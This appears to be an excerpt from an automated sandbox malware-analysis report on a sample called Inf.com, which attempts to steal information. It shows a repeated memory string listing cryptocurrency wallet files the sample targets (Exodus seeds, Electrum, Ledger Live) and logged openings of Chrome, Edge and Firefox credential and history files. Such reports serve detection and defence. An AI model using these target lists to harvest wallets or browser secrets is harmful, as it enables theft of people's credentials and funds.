Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3020527913.0000000001400000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: exodus.*
Source: Inf.com, 00000012.00000002.3020527913.0000000001400000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
